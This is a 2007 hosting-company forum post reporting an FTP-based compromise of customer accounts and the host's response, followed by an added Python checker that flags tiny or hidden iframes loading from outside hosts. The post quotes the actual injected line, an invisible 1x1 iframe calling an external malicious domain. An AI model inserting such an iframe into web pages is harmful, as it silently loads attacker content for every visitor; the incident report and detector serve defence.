04-05-2007, 20:10
eUKhost.com
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,363

Code:
 < iframe src='http://huyamilka.com/strong/092/' width=1  height=1>< /iframe >
This was injected in accounts with weak passwords. I was surprised to see all their data, as they had FTP passwords for main accounts which could have been used to access cPanel as well.

We have managed to find the exact thing which was used, as the datacenter hosting huyamilka.com gave all their data to us to verify. Also, the kid whose server was used gave all data to us, and as per that we have disabled the ftp_exec function on our server. So now we have all types of exec functions disabled on the server, which will cause some inconvenience to our customers, but it is high time to switch to secure applications and secure code. Anything done in PHP won't work for your website hosting. It has to exclude all exec functions to work on our servers.

We have reserved 1 server for exec functions, which will be used to migrate the accounts of customers who insist on exec functions.

Global FTP access will be restored on all servers once all passwords are changed for the accounts which got targeted. We have an abnormal load on the helpdesk for FTP and register_globals, but things will get back to normal in the next 2 days.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
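
A defender's check for this kind of injection, as an added example that is not part of the original post: it scans page source for iframes that are invisibly small or hidden and that load from a host outside the site. The function names, the 2-pixel threshold and the sample page with its example hosts are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_PIXELS = 2  # assumed threshold: frames this small are invisible to a visitor

def _pixels(value):
    # Leading integer of a width/height attribute, or None if absent/non-numeric.
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

class HiddenIframeFinder(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (line number, remote host)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if not host or host in self.own_hosts:
            return  # relative or same-site frame, not what we are hunting
        dims = [_pixels(a.get("width")), _pixels(a.get("height"))]
        tiny = any(d is not None and d <= MAX_PIXELS for d in dims)
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            line, _ = self.getpos()
            self.findings.append((line, host))

def find_hidden_iframes(text, own_hosts=()):
    finder = HiddenIframeFinder(own_hosts)
    finder.feed(text)
    finder.close()
    return finder.findings

# Constructed sample: line 3 has the shape of the injected frame, line 4 is a normal embed.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src='http://injected.example/strong/092/' width=1  height=1></iframe>
<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>
<iframe src="/local/frame.html" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host in find_hidden_iframes(SAMPLE):
        print(f"line {line}: hidden iframe to {host}")
```

Run it over every file in an account's web root after a password reset to confirm the injected line is gone; pass the site's own hostnames as `own_hosts` to suppress legitimate same-site frames.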